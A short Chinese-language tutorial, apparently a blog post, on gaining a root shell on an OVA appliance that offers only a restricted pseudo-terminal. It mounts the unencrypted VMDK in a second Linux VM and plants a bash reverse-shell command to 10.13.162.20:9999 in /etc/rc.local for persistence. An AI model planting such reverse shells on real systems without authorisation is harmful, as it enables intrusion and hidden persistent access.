场景描述
某个系统是ova文件,导入虚拟机启动,但是启动后只有一个伪终端权限,即权限很小,如何拿到这个虚拟机的shell权限呢?
实际操作
这次运气比较好,所遇到的系统磁盘并没有被加密,所以直接导入虚拟机后,使用DiskGenius查看生成的vmdk文件,定位到所需要挂载的盘符为/dev/sda1。
所以直接新开启一台linux虚拟机,选择添加硬盘,并选择刚才的vmdk文件:
进入虚拟机shell后,可以使用lsblk命令查看盘符,然后使用如下命令进行挂载:
mkdir mydisk1
mount /dev/sda1 mydisk1
cd mydisk1
进去后,找到/etc/rc.local文件,将反弹shell命令输入到该文件中
bash -i >& /dev/tcp/10.13.162.20/9999 0>&1 &
然后本机开启监听,成功拿到root权限!
参考连接
https://badmonkey.site/archives/vm-getshell